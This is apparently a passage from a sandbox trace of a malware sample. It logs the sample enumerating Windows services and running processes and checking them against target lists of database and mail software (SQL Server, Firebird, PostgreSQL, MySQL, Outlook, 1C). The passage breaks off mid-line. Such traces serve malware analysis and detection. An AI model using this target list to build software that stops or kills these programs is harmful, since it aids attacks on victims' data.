1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0040.941] lstrlenW (lpString="CryptSvc") returned 8 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0040.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0040.941] lstrlenW (lpString="CscService") returned 10 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0040.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0040.941] lstrlenW (lpString="DcomLaunch") returned 10 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0040.941] lstrlenW (lpString="Dhcp") returned 4 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0040.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0040.942] lstrlenW (lpString="Dnscache") returned 8 [0040.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0040.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0040.942] lstrlenW (lpString="DPS") returned 3 [0040.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0040.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0040.942] lstrlenW (lpString="eventlog") returned 8 [0040.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0040.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0040.942] lstrlenW (lpString="EventSystem") returned 11 [0040.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0040.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0040.942] lstrlenW (lpString="gpsvc") returned 5 [0040.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0040.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0040.942] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0040.942] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0040.943] lstrlenW (lpString="iphlpsvc") returned 8 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0040.943] lstrlenW (lpString="LanmanServer") returned 12 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0040.943] lstrlenW (lpString="LanmanWorkstation") returned 17 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0040.943] lstrlenW (lpString="lmhosts") returned 7 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0040.943] lstrlenW (lpString="MMCSS") returned 5 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0040.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0040.943] lstrlenW (lpString="MpsSvc") returned 6 [0040.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0040.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0040.943] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0040.943] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0040.944] lstrlenW (lpString="Netman") returned 6 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0040.944] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0040.944] lstrlenW (lpString="netprofm") returned 8 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0040.944] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0040.944] lstrlenW (lpString="NlaSvc") returned 6 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0040.944] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0040.944] lstrlenW (lpString="nsi") returned 3 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0040.944] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0040.944] lstrlenW (lpString="PcaSvc") returned 6 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0040.944] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0040.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0040.944] lstrlenW (lpString="PlugPlay") returned 8 [0040.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0040.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0040.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0040.945] lstrlenW (lpString="Power") returned 5 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0040.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0040.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0040.945] lstrlenW (lpString="ProfSvc") returned 7 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0040.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0040.945] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0040.945] lstrlenW (lpString="RpcEptMapper") returned 12 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0040.945] lstrlenW (lpString="RpcSs") returned 5 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0040.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0040.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0040.945] lstrlenW (lpString="SamSs") returned 5 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0040.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0040.945] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0040.945] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0040.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0040.945] lstrlenW (lpString="Schedule") returned 8 [0040.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0040.946] lstrlenW (lpString="SENS") returned 4 [0040.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0040.946] lstrlenW (lpString="ShellHWDetection") returned 16 [0040.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0040.946] lstrlenW (lpString="Spooler") returned 7 [0040.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0040.946] lstrlenW (lpString="swprv") returned 5 [0040.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0040.946] lstrlenW (lpString="SysMain") returned 7 [0040.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0040.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0040.946] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0040.946] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0040.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0040.947] lstrlenW (lpString="Themes") returned 6 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0040.947] lstrlenW (lpString="TrkWks") returned 6 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0040.947] lstrlenW (lpString="UxSms") returned 5 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0040.947] lstrlenW (lpString="VSS") returned 3 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0040.947] lstrlenW (lpString="WdiServiceHost") returned 14 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0040.947] lstrlenW (lpString="WdiSystemHost") returned 13 [0040.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.947] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0040.947] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0040.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0040.948] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0040.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.948] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0040.948] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0040.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0040.948] lstrlenW (lpString="Winmgmt") returned 7 [0040.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0040.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0040.948] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0040.948] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0040.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0040.948] lstrlenW (lpString="WPDBusEnum") returned 10 [0040.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.948] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0040.948] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0040.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0040.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0040.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0040.953] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.954] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.955] lstrlenW (lpString="System") returned 6 [0040.955] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0040.955] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0040.955] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.955] lstrlenW (lpString="smss.exe") returned 8 [0040.955] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0040.955] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0040.955] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0040.955] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0040.955] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0040.956] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0040.956] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0040.956] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.956] lstrlenW (lpString="csrss.exe") returned 9 [0040.956] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.956] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.956] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.956] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.956] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.956] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.956] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0040.956] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.957] lstrlenW (lpString="wininit.exe") returned 11 [0040.957] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0040.957] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0040.957] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0040.957] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.958] lstrlenW (lpString="csrss.exe") returned 9 [0040.958] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.959] lstrlenW (lpString="winlogon.exe") returned 12 [0040.959] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.959] lstrlenW (lpString="services.exe") returned 12 [0040.959] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.960] lstrlenW (lpString="lsass.exe") returned 9 [0040.960] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.960] lstrlenW (lpString="lsm.exe") returned 7 [0040.961] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.961] lstrlenW (lpString="svchost.exe") returned 11 [0040.961] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.962] lstrlenW (lpString="svchost.exe") returned 11 [0040.962] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.963] lstrlenW (lpString="svchost.exe") returned 11 [0040.963] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.963] lstrlenW 